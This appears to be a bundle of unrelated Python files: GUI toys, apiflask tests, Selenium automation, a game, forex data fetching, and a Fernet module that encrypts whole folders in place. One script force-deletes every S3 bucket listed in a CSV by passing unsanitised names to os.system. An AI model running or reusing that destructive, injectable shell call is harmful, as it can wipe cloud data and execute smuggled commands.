self.setLayout(layout)
self.show()
self.showFullScreen()
def callTimerAndRun(self):
# parent is ConfigWindow
self.timer_window.show()
# this will remove minimized status
# and restore window with keeping maximized/normal state
self.timer_window.setWindowState(self.timer_window.windowState() & ~QtCore.Qt.WindowMinimized | QtCore.Qt.WindowActive)
# this will activate the window
self.timer_window.activateWindow()
self.timer_window.run(self.sec, self.countdownConfig)
self.close()
class PositionSelectionUILabel (QtGui.QLabel):
def __init__ (self, parent = None):
super(PositionSelectionUILabel, self).__init__(parent)
self.parent = parent
self.setMouseTracking(True)
self.setTextLabelPosition(0, 0)
self.setAlignment(QtCore.Qt.AlignCenter)
def mouseMoveEvent (self, event):
self.setTextLabelPosition(event.x(), event.y())
QtGui.QWidget.mouseMoveEvent(self, event)
def mousePressEvent (self, event):
if event.button() == QtCore.Qt.LeftButton:
self.parent.hide()
pos=event.pos()
mouse = PyMouse()
time.sleep(0.2)
mouse.click(pos.x(), pos.y())
# parent is PositionSelectionUI
self.parent.callTimerAndRun()
self.parent.timer_window.move(pos.x() + 320, pos.y() - 380)
QtGui.QWidget.mousePressEvent(self, event)
def setTextLabelPosition (self, x, y):
self.x, self.y = x, y
self.setText('Please click at START button on Posemaniacs page. ( %d : %d )' % (self.x, self.y))
app = QtGui.QApplication(sys.argv)
config_window = ConfigWindow()
config_window.show()
app.exec_()
|
__author__ = "Narwhale"
s = "ajldjlajfdljddd"
s = set(s)
s = list(s)
s.sort(reverse=False)
res = ''.join(s)
print(res)
|
#!/usr/bin/env python
import Tkinter
root = Tkinter.Tk()
canvas = Tkinter.Canvas(root, width=300, height=200)
canvas.pack()
canvas.create_rectangle(50, 50, 150, 100, fill="yellow")
#canvas.create_oval(5, 5, 300, 200, fill="green")
#canvas.create_text(150, 100, text="Amazing!", fill="purple", font="Helvetica 26 bold underline")
root.mainloop()
|
import pytest
from openapi_spec_validator import validate_spec
from apiflask import Schema as BaseSchema
from apiflask.fields import Integer
from apiflask import input
from apiflask import output
from apiflask import doc
from .schemas import FooSchema
from .schemas import BarSchema
from .schemas import BazSchema
def test_spec(app):
assert app.spec
assert 'openapi' in app.spec
def test_spec_processor(app, client):
@app.spec_processor
def edit_spec(spec):
assert spec['openapi'] == '3.0.3'
spec['openapi'] = '3.0.2'
assert app.title == 'APIFlask'
assert spec['info']['title'] == 'APIFlask'
spec['info']['title'] = 'Foo'
return spec
rv = client.get('/openapi.json')
assert rv.status_code == 200
validate_spec(rv.json)
assert rv.json['openapi'] == '3.0.2'
assert rv.json['info']['title'] == 'Foo'
@pytest.mark.parametrize('spec_format', ['json', 'yaml', 'yml'])
def test_get_spec(app, spec_format):
spec = app.get_spec(spec_format)
if spec_format == 'json':
assert isinstance(spec, dict)
else:
assert 'title: APIFlask' in spec
def test_spec_schemas(app):
@app.route('/foo')
@output(FooSchema(partial=True))
def foo():
pass
@app.route('/bar')
@output(BarSchema(many=True))
def bar():
pass
@app.route('/baz')
@output(BazSchema)
def baz():
pass
class Spam(BaseSchema):
id = Integer()
@app.route('/spam')
@output(Spam)
def spam():
pass
class Schema(BaseSchema):
id = Integer()
@app.route('/schema')
@output(Schema)
def schema():
pass
with app.app_context():
spec = app.spec
assert len(spec['components']['schemas']) == 5
assert 'FooUpdate' in spec['components']['schemas']
assert 'Bar' in spec['components']['schemas']
assert 'Baz' in spec['components']['schemas']
assert 'Spam' in spec['components']['schemas']
assert 'Schema' in spec['components']['schemas']
def test_servers_and_externaldocs(app):
assert app.external_docs is None
assert app.servers is None
app.external_docs = {
'description': 'Find more info here',
'url': 'https://docs.example.com/'
}
app.servers = [
{
'url': 'http://localhost:5000/',
'description': 'Development server'
},
{
'url': 'https://api.example.com/',
'description': 'Production server'
}
]
rv = app.test_client().get('/openapi.json')
assert rv.status_code == 200
validate_spec(rv.json)
assert rv.json['externalDocs'] == {
'description': 'Find more info here',
'url': 'https://docs.example.com/'
}
assert rv.json['servers'] == [
{
'url': 'http://localhost:5000/',
'description': 'Development server'
},
{
'url': 'https://api.example.com/',
'description': 'Production server'
}
]
def test_auto_200_response(app, client):
@app.get('/foo')
def bare():
pass
@app.get('/bar')
@input(FooSchema)
def only_input():
pass
@app.get('/baz')
@doc(summary='some summary')
def only_doc():
pass
@app.get('/eggs')
@output(FooSchema, 204)
def output_204():
pass
@app.get('/spam')
@doc(responses={204: 'empty'})
def doc_responses():
pass
rv = client.get('/openapi.json')
assert rv.status_code == 200
validate_spec(rv.json)
assert '200' in rv.json['paths']['/foo']['get']['responses']
assert '200' in rv.json['paths']['/bar']['get']['responses']
assert '200' in rv.json['paths']['/baz']['get']['responses']
assert '200' not in rv.json['paths']['/eggs']['get']['responses']
assert '200' not in rv.json['paths']['/spam']['get']['responses']
assert rv.json['paths']['/spam']['get']['responses'][
'204']['description'] == 'empty'
|
x = range (1,100)
divisors = []
number = int(input("Give me a number to return it's divisors:"))
for i in x:
if ((number % i == 0)):
divisors.append(i)
print (divisors)
|
print('hello')
thank you
|
from flask_api import status
from tests.base_login_test_case import BaseLoginTestCase
from tests.base_photo_test_case import BasePhotoTestCase
class ResizedTestCase(BasePhotoTestCase, BaseLoginTestCase):
"""
Tests the route for resizing images.
"""
def test_route(self):
"""
Tests the route is working.
"""
length = 200
self.photo.thumbnail(length, length)
response = self.client.get(f'/resized-images/{length}_{length}_{self.photo.filename}')
self.assertEqual(status.HTTP_200_OK, response.status_code, msg=response)
|
import logging
import configparser
import os
import time
from selenium import webdriver
from gui import *
from math import ceil
from threading import Thread
# from selenium.webdriver.common.keys import Keys
# from selenium.webdriver.chrome.options import Options
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
fh = logging.FileHandler("logs.log", 'w', encoding="utf-8",)
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
log.addHandler(fh)
driverpath = f'{os.getcwd()}\\geckodriver.exe'
class BrowserThread(Thread):
def __init__(self):
Thread.__init__(self)
self.start()
def run(self):
driver.maximize_window()
driver.implicitly_wait(30)
login()
while True:
if active[0] and frames:
editcamps()
def login():
config = configparser.ConfigParser()
if os.path.isfile('config.ini'):
config.read('config.ini')
login = config['Admin']['Login']
password = config['Admin']['Pass']
else:
log.critical('Config file (config.ini) not found')
log.info('Opening main page...')
driver.get('https://megapu.sh/?a=campaigns&f=stop')
log.info('Done')
input_login = driver.find_element_by_id('login')
input_pass = driver.find_element_by_id('password')
input_login.send_keys(login)
input_pass.send_keys(password)
input()
driver.get('https://megapu.sh/?a=campaigns&f=stop')
def editcamps():
pages = ceil(int(driver.find_element_by_class_name('counter-stop').text) / 25) #counter-running
for frame in frames:
log.debug('Checking frame...')
if frame['id'].get() != '0':
for page in range(pages):
driver.get(f'https://megapu.sh/?a=campaigns&f=stop&camp_id={frame["id"].get()}&action=edit&page={page}')
time.sleep(3)
log.debug('Searcing for campid...')
if driver.find_element_by_id('camp_id').text == frame['id'].get():
log.debug(f'Found {frame["id"].get()}')
break
if __name__ == '__main__':
driver = webdriver.Firefox(executable_path=driverpath)
browser = BrowserThread()
root.mainloop()
|
import os
import csv
from itertools import chain
with open('buckets.csv', 'r') as f:
reader = csv.reader(f)
s3_buckets = list(reader)
for buckets in s3_buckets:
for bucket in buckets:
os.system(f"aws s3 rb {bucket} --force")
|
"""This program plays a game of Rock, Paper, Scissors between two Players,
and reports both Player's scores each round."""
import random
moves = ['rock', 'paper', 'scissors']
"""The Player class is the parent class for all of the Players
in this game"""
class Player:
def move(self):
return 'rock'
def learn(self, my_move, their_move):
pass
def beats(one, two):
return ((one == 'rock' and two == 'scissors') or
(one == 'scissors' and two == 'paper') or
(one == 'paper' and two == 'rock'))
class RandomPlayer(Player):
def move(self):
move_to_play = random.randrange(3)
return moves[move_to_play]
def learn(self, my_move, their_move):
pass
class ReflectPlayer(Player):
def __init__(self):
self.last_move = "none"
def move(self):
if self.last_move == "none":
move_to_play = random.randrange(3)
return moves[move_to_play]
else:
return self.last_move
def learn(self, my_move, their_move):
self.last_move = their_move
#https://docs.python.org/3.4/library/itertools.html
class CyclePlayer(Player):
def __init__(self):
self.cycle = 0
def move(self):
if self.cycle == 0:
self.cycle += 1
return moves[0]
elif self.cycle == 1:
self.cycle += 1
return moves[1]
elif self.cycle == 2:
self.cycle = 0
return moves[2]
def learn(self, my_move, their_move):
pass
class HumanPlayer(Player):
def move(self):
throw = input('rock, paper, scissors?')
while throw != 'rock' and throw != 'paper' and throw != 'scissors':
print('Invalid choice. Please try again.')
throw = input('rock, paper, scissors?')
return(throw)
def beats(one, two):
return ((one == 'rock' and two == 'scissors') or
(one == 'scissors' and two == 'paper') or
(one == 'paper' and two == 'rock'))
class Game:
def __init__(self, p1, p2):
self.p1 = p1
self.p2 = p2
self.p1_score = 0
self.p2_score = 0
def play_round(self):
move1 = self.p1.move()
move2 = self.p2.move()
winning_player = None
winner = beats(move1, move2)
if move1 == move2:
print("DRAW!")
return [self.p1_score, self.p2_score]
if winner:
winning_player = "p1"
self.p1_score += 1
else:
winning_player = "p2"
self.p2_score += 1
print(f"Player 1: {move1} Player 2: {move2}")
print("Winner : ", winning_player)
print("p1Pts:" + str(self.p1_score) + "|p2Pts:" + str(self.p2_score))
self.p1.learn(move1, move2)
self.p2.learn(move2, move1)
return [self.p1_score, self.p2_score]
def play_game(self):
print("Game start!")
for round in range(3):
print(f"Round {round}:")
scores = self.play_round()
print("Game over!")
if scores[0] > scores[1]:
winner = "Player 1"
elif scores[0] < scores[1]:
winner = "Player 2"
elif scores[0] == scores[0]:
winner = "DRAW!"
print("p1 score:" + str(scores[0]))
print("| p2 score:" + str(scores[1]))
print("WINNER: " + winner)
if __name__ == '__main__':
game = Game(ReflectPlayer(), HumanPlayer())
game.play_game()
|
import json
import csv
import requests
import DiscoveryDetails as dt
output_file = open("./training_file.tsv", "w")
writer = csv.writer(output_file, delimiter="\t")
try:
with open ("./Questions.txt", encoding="Windows 1252") as questions:
noOfQuestions = 0
for line in questions:
print("Question No = " + str(noOfQuestions + 1))
question = line.replace("\n", "")
print("Question = " + question)
question = "%s" % (question)
#run Discovery query to get results from untrained service
result = dt.discovery.query(environment_id=dt.environment_id, collection_id=dt.collection_id, deduplicate=False, highlight=True, passages=True, passages_count=5, natural_language_query=question, count=5)
#print("Query Response = " + json.dumps(result.get_result()))
#create a row for each query and results
result_list = [question]
for resultDoc in result.get_result()["results"]:
id = resultDoc["id"]
text = resultDoc["text"]
#for resultDoc in result.get_result()["passages"]:
#id = resultDoc["document_id"]
#text = resultDoc["passage_text"]
if( len(text) > 1000 ):
text = text[:1000]
result_list.extend([id,text,' ']) #leave a space to enter a relevance label for each doc
#write the row to the file
writer.writerow(result_list)
noOfQuestions = noOfQuestions + 1
print("==========================================================")
print("")
print("tsv file with questions and query results created")
print("Number of questions processed = " + str(noOfQuestions))
output_file.close()
except Exception as e:
print("Exception occurred ####### ")
print(e)
|
import pygame
from view.game_view import GameView
from model.game_model import GameModel
from controller.player_input import player_input
from controller.enemy_input import enemy_input
from model.vehicle_handling.spawn_enemies import spawn_chance
import time
def p1_start(window):
game_view = GameView(window)
game_model = GameModel()
has_not_quit_game = True
while has_not_quit_game:
events = pygame.event.get()
spawn_chance(game_model.vehicles)
has_not_quit_game = player_input(game_model.player, events)
enemy_input(game_model.vehicles)
game_model.update()
game_view.update(game_model.vehicles)
if not game_model.check_if_player_is_alive(game_model.player):
time.sleep(2.2)
break
# print(window.clock.get_fps())
window.clock.tick(120)
|
'''
66. Plus One
Given a non-empty array of decimal digits representing a non-negative integer, increment one to the integer.
The digits are stored such that the most significant digit is at the head of the list, and each element in the array contains a single digit.
You may assume the integer does not contain any leading zero, except the number 0 itself.
Example 1:
Input: digits = [1,2,3]
Output: [1,2,4]
Explanation: The array represents the integer 123.
Example 2:
Input: digits = [4,3,2,1]
Output: [4,3,2,2]
Explanation: The array represents the integer 4321.
Example 3:
Input: digits = [0]
Output: [1]
'''
class Solution:
def plusOne(self, digits):
digits = digits[::-1]
finished = False
i = 0
while not finished:
if i < len(digits):
if digits[i] == 9:
digits[i] = 0
else:
digits[i] += 1
finished = True
else:
digits.append(1)
finished = True
i += 1
return digits[::-1]
|
from cryptography.fernet import Fernet
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
import codecs
import os
import sys
def my_xor(x, y):
"""
Xor x et y qui sont deux integer
"""
return (x | y) & (~x | ~y)
def generate_fernet_key_file(path_cle, nom_cle, path_sd):
"""
Créer les fichiers contenant les bouts de clé et le fichier contenant la vrai clé hashé (SHA256)
:param path_cle: Chemin de la clé sur le pc
:param nom_cle: Nom du fichier de la clé avec son extension
:param path_sd: Chemin de la clé sur la carte SD
:return:
"""
try:
cid = str(find_cid(path_sd)).replace("\\x", "")[2:-1]
except Exception as e:
return
key_pc = str(Fernet.generate_key()).replace("-", "+").replace("_", "/")[2:-1].encode()
with open(path_cle + nom_cle, "wb")as key_file:
key_file.write(key_pc)
key_sd = str(Fernet.generate_key()).replace("-", "+").replace("_", "/")[2:-1].encode()
with open(path_sd + nom_cle, "wb")as key_file:
key_file.write(key_sd)
master_key_hex = generate_master_key_hex(key_pc, key_sd, cid)
digest = hashes.Hash(hashes.SHA256(), backend=default_backend())
digest.update(master_key_hex.encode())
master_digest = digest.finalize()
with open(path_cle + "Master_" + nom_cle, "wb")as key_file:
key_file.write(master_digest)
def generate_master_key_hex(key_pc, key_sd, cid):
"""
Encode les bouts de clé en hexadécimal pour les xor et retourne la vraie clé en hexadécimal
"""
key_pc_hex = codecs.encode(codecs.decode(key_pc, 'base64'), 'hex').decode()
key_sd_hex = codecs.encode(codecs.decode(key_sd, 'base64'), 'hex').decode()
master_key = my_xor(my_xor(int(key_pc_hex, 16), int(cid, 16)), int(key_sd_hex, 16))
master_key_hex = str(hex(master_key))[2:]
if len(master_key_hex) < len(key_pc_hex):
master_key_hex = "0" + master_key_hex
return master_key_hex
def create_master_key_hex(path_cle, nom_cle, path_sd):
"""
Crée la clé en hexadécimal
"""
with open(path_cle + nom_cle, "rb")as key_file:
key_pc = key_file.read()
with open(path_sd + nom_cle, "rb")as key_file:
key_sd = key_file.read()
try:
cid = str(find_cid(path_sd)).replace("\\x", "")[2:-1]
except Exception as e:
raise e
master_key_hex = generate_master_key_hex(key_pc, key_sd, cid)
return master_key_hex
def create_master_key(path_cle, nom_cle, path_sd):
"""
Crée la clé en base64 url_safe
Fonction utilisé pour créer la clé fonctionnant avec les fonctions encrypt et decrypt
:param path_cle: Chemin de la clé sur le pc
:param nom_cle: Nom du fichier de la clé avec son extension
:param path_sd: Chemin de la clé sur la carte SD
:return: La vraie clé en base64 url_safe
"""
master_key_hex = create_master_key_hex(path_cle, nom_cle, path_sd)
master_key = codecs.encode(codecs.decode(master_key_hex, 'hex'), 'base64').decode()
return master_key.replace("+", "-").replace("/", "_")[:-1].encode()
def check_keys(path_cle, nom_cle, path_sd):
"""
Assemble les clés, ouvre le fichier SHA256 et compare les valeurs
:param path_cle: Chemin de la clé sur le pc
:param nom_cle: Nom du fichier de la clé avec son extension
:param path_sd: Chemin de la clé sur la carte SD
:return: True si le sha256 correspond bien à cette clé, False sinon
"""
try:
master_key_hex = create_master_key_hex(path_cle, nom_cle, path_sd)
except Exception as e:
print("Problème de CID")
return False
with open(path_cle + "Master_" + nom_cle, "rb")as key_file:
master_digest = key_file.read()
digest = hashes.Hash(hashes.SHA256(), backend=default_backend())
digest.update(master_key_hex.encode())
if digest.finalize() == master_digest:
return True
else:
return False
def encode_fernet(key, message):
"""
Chiffre un message
:param key: Clé provenant de la fonction create_master_key
:param message: Message à chiffrer
:return:
"""
fernet_key = Fernet(key)
token = fernet_key.encrypt(message)
return token
def decode_fernet(key, token):
"""
Déchiffre un message
:param key: Clé provenant de la fonction create_master_key
:param token: Message à déchiffrer
:return:
"""
fernet_key = Fernet(key)
message = fernet_key.decrypt(token)
return message
def encrypt_file_fernet(key, path):
"""
Chiffre un fichier
:param key: Clé provenant de la fonction create_master_key
:param path: Chemin du fichier à Chiffrer
:return:
"""
with open(path, "rb") as file_read:
message = file_read.read()
pass_encrypt = encode_fernet(key, message)
with open(path, "wb") as file_write:
file_write.write(pass_encrypt)
def decrypt_file_fernet(key, path):
"""
Déchiffre un fichier
:param key: Clé provenant de la fonction create_master_key
:param path: Chemin du fichier à déchiffrer
:return:
"""
with open(path, "rb") as file_read:
token = file_read.read()
pass_decrypt = decode_fernet(key, token)
with open(path, "wb") as file_write:
file_write.write(pass_decrypt)
def encrypt_directory_fernet(key, path):
"""
Chiffre complètement un dossier
:param key: Clé provenant de la fonction create_master_key
:param path: Chemin du dossier à Chiffrer
:return:
"""
for paths, dirs, files in os.walk(path):
for filename in files:
encrypt_file_fernet(key, paths + os.sep + filename)
def decrypt_directory_fernet(key, path):
"""
Déchiffre complètement un dossier
:param key: Clé provenant de la fonction create_master_key
:param path: Chemin du dossier à déchiffrer
:return:
"""
for paths, dirs, files in os.walk(path):
for filename in files:
decrypt_file_fernet(key, paths + os.sep + filename)
def find_cid(path):
"""
Trouve le CID de la carte SD
"""
cid = ""
if sys.platform == "win32":
try:
f = open("\\\\.\\"+path[:-1], 'rb')
cid = f.read(43)[39:] # Volume ID dans le cas de windows
except Exception as e:
print(path[:-1])
raise e
elif sys.platform == "linux":
try:
f = open("/sys/block/" + str(path) + "device/cid", 'rb')
cid = f.read()
except Exception as e:
return e
return bytes(cid)
""" EXEMPLE """
def testcreer():
path = "prout"
path_cle = ""
nom_cle = "cleSD.txt"
if not generate_fernet_key_file(path_cle, nom_cle, "H:" + os.sep):
print("Problème de CID, rien n'est généré")
return
key = create_master_key(path_cle, nom_cle, "H:\\")
encrypt_directory_fernet(key, path)
def testdecrypt():
path = "prout"
path_cle = ""
nom_cle = "cleSD.txt"
key = create_master_key(path_cle, nom_cle, "H:\\")
decrypt_directory_fernet(key, path)
|
from DeepLearning.Layers.Affine import *
from DeepLearning.Layers.Add import *
from DeepLearning.Layers.MulLayer import *
from DeepLearning.Layers.ReluLayer import *
from DeepLearning.Layers.SigmoidLayer import *
from DeepLearning.Layers.SoftmaxWithLossLayer import *
|
# -*- coding:utf-8 -*-
'''
Created on 2016年3月24日
@author: huke
'''
def Cycle():
L = ['Bart', 'Lisa', 'Adam']
for x in L:
print(x)
def Cycle2():
s = 0
for x in range(101):
s += x
print(s)
if __name__ == '__main__':
Cycle()
Cycle2()
input()
|
# __author__ = 'azhukov'
# import cProfile
# import random
#
# from py_skiplist.skiplist import Skiplist
# from py_skiplist.iterators import geometric
from bintrees import RBTree
#
# DATA_SET = [random.randint(1, 10**3) for i in range(100000)]
# READ_INPUT = [random.randint(1, 10**3) for j in range(1)]
#
# def run_skiplist_test():
# sl = Skiplist()
# for c in DATA_SET:
# sl._insert(c, c)
# # print sum(len(node.nxt) for node in sl._level(level=0))
# # print [len(node.nxt) for node in sl._level(level=0)]
# # g = geometric(0.5)
# # print [next(g) for _ in range(200)]
# return sl
#
# sl = run_skiplist_test()
# # print sum(len(node.nxt) for node in sl._level(level=0))
# print [len(node.nxt) for node in sl._level(level=0)]
# # g = geometric(0.5)
# print [next(sl.distribution) +1 for _ in range(200)]
#
#
# def sl_read():
# for j in READ_INPUT:
# sl.get(i)
# # print sl.n, sl.nc, ncals
# # print sum(len(node.nxt) for node in sl._level())
#
# def run_rbtree_test():
# tree = RBTree()
# for i in DATA_SET:
# tree[str(i)] = i
# return tree
#
# tree = run_rbtree_test()
#
# def tree_read():
# for k in READ_INPUT:
# tree.get(k)
#
# # cProfile.run('sl._insert(5000, 30)')
# cProfile.run('run_skiplist_test()')
# cProfile.run('run_rbtree_test()')
# # cProfile.run('sl_read()')
# # cProfile.run('tree_read()')
#
# from pycallgraph import PyCallGraph
# from pycallgraph.output import GraphvizOutput
#
# # with PyCallGraph(output=GraphvizOutput()):
# # run_skiplist_test()
|
class Record(bytearray):
"""
Unit of physical stored information in the database
"""
def __init__(self, data: bytes, index: int = 0):
"""
Creates new record object from initial bytes of data.
:param data: initial bytes.
:param index: physical index of record in the storage.
"""
super().__init__(data)
self.idx = index
self.size = len(data)
@classmethod
def empty(cls, size: int, index: int = 0) -> 'Record':
"""
Creates empty record filled with zeroes.
:param size: size of empty record.
:param index: physical index of record in the storage.
:return: new record object.
"""
return Record(b'\0' * size, index)
def override(self, offset: int, data: bytes) -> None:
"""
Overrides subset of bytes of record data.
:param offset: starting position of new data
:param data: data to be written
:return: None
"""
assert offset + len(data) <= self.size
self[offset:offset + len(data)] = data
def set_index(self, index: int):
self.idx = index
|
import os
import requests
import collections
import re
import sys
import numpy as np
class ReadForexData:
"""read the up-to-date forex data via oanda API"""
def __init__(self, parameter_dict):
self.mode = parameter_dict['mode']
self.instruments_list = ['EUR_USD', 'USD_JPY', 'USD_CAD', 'GBP_USD', 'USD_CHF','AUD_USD']
self.instrument = parameter_dict['instrument']
self.granularity = parameter_dict['granularity']
self.candle_format = parameter_dict['candle_format']
self.date_range = parameter_dict['date_range']
self.time_zone = parameter_dict['alignmentTimezone']
self.file_path = parameter_dict['file_path']
self.output_attributors_str = parameter_dict['output_attributors_str']
# reference:
# http://developer.oanda.com/docs/timezones.txt
self.url = "https://api-fxtrade.oanda.com/v1/candles?" \
"instrument={instrument}&" \
"count={date_range}&" \
"candleFormat={candle_format}&" \
"granularity={granularity}&" \
"dailyAlignment=0&" \
"alignmentTimezone={time_zone}".format(instrument = self.instrument,
date_range = self.date_range,
candle_format = self.candle_format,
granularity = self.granularity,
time_zone = self.time_zone)
self.forex_data_dict = collections.defaultdict(lambda :[])
def write_forex_dict_to_file(self):
path = self.file_path
#self.forex_data_dict : {'EUR_USD':[('AUD_USD', '2014-9-9', 0.77157, 0.772, 0.767955, 0.76851, 0.76, 0.11, 0.14), ...]}
with open (path, 'w', encoding = 'utf-8') as f:
f.write("{}\n".format(self.output_attributors_str))
for instrument, days_feature_list in self.forex_data_dict.items():
for i, day_features in enumerate(days_feature_list):
day_features = [str(x) for x in day_features]
feature_str = ','.join(day_features)
if i == len(days_feature_list) - 1:
f.write(feature_str)
else:
f.write(feature_str)
f.write('\n')
#['_', 'AUD_USD', '02/21/2017', '-0.12', '0.1', '-0.2', '0.31', '6162', '26.63',
# '0.4', '1.8', '1.8', '3.2', '0.48', '0.64', '0.84', '-0.047', '-0.238', '-0.471\
# n']
def get_data_distribution(self, file_path):
feature_all_value_dict = collections.defaultdict(lambda:[])
feature_value_distribution_dict = collections.defaultdict(lambda:[])
with open(file_path, 'r', encoding = 'utf-8') as f:
for line in (f):
feature_list = line.split(',')
for i, feature in enumerate(feature_list):
if i < 3:
continue
feature_all_value_dict[i].append(float(feature.strip()))
# compute max, min, etc
for feature_id, feature_value_list in feature_all_value_dict.items():
max_value = max(feature_value_list)
min_value = min(feature_value_list)
zero_list = [0 for x in feature_value_list if x == 0]
# pos
pos_feature_value_list = [x for x in feature_value_list if x > 0]
if len(pos_feature_value_list) > 0:
pos_average = sum(pos_feature_value_list) / len(pos_feature_value_list)
else:
pos_average = 0
# neg
neg_feature_value_list = [x for x in feature_value_list if x < 0]
if len(neg_feature_value_list) > 0:
neg_average = sum(neg_feature_value_list) / len(neg_feature_value_list)
else:
neg_average = 0
# zero_num
zero_num = len(zero_list)
feature_value_distribution_dict[feature_id] = (max_value, min_value, pos_average, neg_average, zero_num)
# write everything to file
with open ('feature_value_distribution_dict.txt', 'w', encoding = 'utf-8') as f:
feature_value_distribution_list = list(feature_value_distribution_dict.items())
for feature_id, value_tuple in feature_value_distribution_list:
max_value = value_tuple[0]
min_value = value_tuple[1]
pos_average = value_tuple[2]
neg_average = value_tuple[3]
zero_num = value_tuple[4]
f.write("Feature_id: {}, max: {}, min: {}, pos_average: {}, neg_average: {}, zero_num: {}"
.format(feature_id, max_value, min_value, pos_average, neg_average, zero_num))
f.write('\n')
def read_onanda_data(self):
def compute_std(day, day_forex_list, feature, i, instrument):
variance_list = []
for j in range(day):
feature_value = day_forex_list[i-j][feature]
if feature == 'openMid':
if instrument == 'USD_JPY':
feature_value *= 10
else:
feature_value *= 1000
elif feature == 'volume':
feature_value /= 1000
variance_list.append(feature_value)
std = np.std(variance_list)
std = float("{:3.1f}".format(std))
#oanda_logger.debug("instrument: {}, feature :{}, variance: {}".format(instrument, feature, std))
return std
'''read oanda data via online api to dict with several features'''
ignore_date_num = 7
for instrument in self.instruments_list:
url = self.url.replace("#instrument", instrument)
response = requests.get(url)
response_status_code = response.status_code
print("response_status_code: ", response_status_code)
day_forex_list = dict(response.json())['candles']
#print (day_forex_list)
for i, day_forex_dict in enumerate(day_forex_list):
if self.mode == 'testing':
if i < ignore_date_num or i > len(day_forex_list) - 1 - ignore_date_num: # -1-7
continue
elif self.mode == 'trading':
if i < ignore_date_num:
continue
time = day_forex_dict['time']
time = re.findall(r'([0-9]+-[0-9]+-[0-9]+)', time)[0]
time_list = time.split('-')
# switch year with day, day with month
time_list[0], time_list[2] = time_list[2], time_list[0]
time_list[0], time_list[1] = time_list[1], time_list[0]
time = '/'.join(time_list)
## getting features
# openMid
openMid = day_forex_dict['openMid']
openMid_1_day_ago = day_forex_list[i - 1]['openMid']
openMid_1_day_percent = float("{:2.2f}".format(100*((openMid - openMid_1_day_ago)/ openMid)))
openMid_3_day_std = compute_std(3, day_forex_list, 'openMid', i, instrument)
openMid_7_day_std = compute_std(7, day_forex_list, 'openMid', i, instrument)
# highMid
highMid = day_forex_dict['highMid']
highMid_1_day_ago = day_forex_list[i - 1]['highMid']
highMid_1_day_percent = float("{:2.2f}".format(100*((highMid - highMid_1_day_ago) / highMid)))
# lowMid
lowMid = day_forex_dict['lowMid']
lowMid_1_day_ago = day_forex_list[i - 1]['lowMid']
lowMid_percent = float("{:2.2f}".format(100*((lowMid - lowMid_1_day_ago)/ lowMid)))
# closeMid
if self.mode == 'trading':
closeMid = day_forex_dict['closeMid']
closeMid_1_day_ago = day_forex_list[i - 1]['closeMid']
closeMid_1_day_later = 0.0
closeMid_3_day_later = 0.0
closeMid_7_day_later = 0.0
closeMid_1_day_percent = float("{:2.2f}".format(100*((closeMid - closeMid_1_day_ago)/ closeMid)))
elif self.mode == 'testing':
closeMid = day_forex_dict['closeMid']
closeMid_1_day_ago = day_forex_list[i - 1]['closeMid']
closeMid_1_day_later = day_forex_list[i + 1]['closeMid']
closeMid_3_day_later = day_forex_list[i + 3]['closeMid']
closeMid_7_day_later = day_forex_list[i + 7]['closeMid']
closeMid_1_day_percent = float("{:2.2f}".format(100*((closeMid - closeMid_1_day_ago)/ closeMid)))
# volume
volume = day_forex_dict['volume']
volume_1_day_ago = day_forex_list[i - 1]['volume']
volume_1_day_percent = float("{:2.2f}".format(100*((volume - volume_1_day_ago)/ volume)))
volume_3_day_std = compute_std(3, day_forex_list, 'volume', i, instrument)
volume_7_day_std = compute_std(7, day_forex_list, 'volume', i, instrument)
# profit
if self.mode == 'trading':
profit_1_day = 0.0
profit_3_day = 0.0
profit_7_day = 0.0
elif self.mode == 'testing':
profit_1_day = float("{:2.3f}".format(100*((closeMid_1_day_later - closeMid) / closeMid)))
profit_3_day = float("{:2.3f}".format(100*((closeMid_3_day_later - closeMid) / closeMid)))
profit_7_day = float("{:2.3f}".format(100*((closeMid_7_day_later - closeMid) / closeMid)))
# custom feature
if highMid - lowMid == 0:
real_body_percent = 0.0
upper_shadow_percent = 0.0
lower_shadow_percent = 0.0
else:
real_body_percent = float("{:2.2f}".format(100*abs((openMid - closeMid) / (highMid - lowMid))))
upper_shadow_percent = float("{:2.2f}".format(100*abs((highMid - openMid) / (highMid - lowMid))))
lower_shadow_percent = float("{:2.2f}".format(100*abs((closeMid - lowMid) / (highMid - lowMid))))
# 1,AA,1/14/2011,$16.71,$16.71,$15.64,$15.97,242963398,-4.42849,1.380223028,239655616,$16.19,$15.79,
# -2.47066,19,0.187852
day_forex_tuple = ('_', instrument, time, openMid_1_day_percent, highMid_1_day_percent, lowMid_percent,
closeMid_1_day_percent, volume, volume_1_day_percent, openMid_3_day_std,
openMid_7_day_std, volume_3_day_std, volume_7_day_std,
real_body_percent, upper_shadow_percent, lower_shadow_percent, profit_1_day,
profit_3_day, profit_7_day, openMid)
self.forex_data_dict[instrument].append(day_forex_tuple)
def new_read_data_from_onanda(self):
def compute_std(day, day_forex_list, feature, i, instrument):
variance_list = []
for j in range(day):
feature_value = day_forex_list[i-j][feature]
if feature == 'openMid':
if instrument == 'USD_JPY':
feature_value *= 10
else:
feature_value *= 1000
elif feature == 'volume':
feature_value /= 1000
variance_list.append(feature_value)
std = np.std(variance_list)
std = float("{:3.1f}".format(std))
#oanda_logger.debug("instrument: {}, feature :{}, variance: {}".format(instrument, feature, std))
return std
'''read oanda data via online api to dict with several features'''
ignore_date_num = 7
instrument = self.instrument
url = self.url
response = requests.get(url)
response_status_code = response.status_code
print("response_status_code: ", response_status_code)
day_forex_list = dict(response.json())['candles']
#print (day_forex_list)
for i, day_forex_dict in enumerate(day_forex_list):
if self.mode == 'testing':
if i < ignore_date_num or i > len(day_forex_list) - 1 - ignore_date_num: # -1-7
continue
elif self.mode == 'trading':
if i < ignore_date_num:
continue
time = day_forex_dict['time']
time = re.findall(r'([0-9]+-[0-9]+-[0-9]+)', time)[0]
time_list = time.split('-')
# switch year with day, day with month
time_list[0], time_list[2] = time_list[2], time_list[0]
time_list[0], time_list[1] = time_list[1], time_list[0]
time = '/'.join(time_list)
## getting features
# openMid
openMid = day_forex_dict['openMid']
# highMid
highMid = day_forex_dict['highMid']
# lowMid
lowMid = day_forex_dict['lowMid']
# closeMid
closeMid = day_forex_dict['closeMid']
# volume
volume = day_forex_dict['volume']
day_forex_tuple = (instrument, time, openMid, closeMid, highMid, lowMid, volume)
self.forex_data_dict[instrument].append(day_forex_tuple)
|
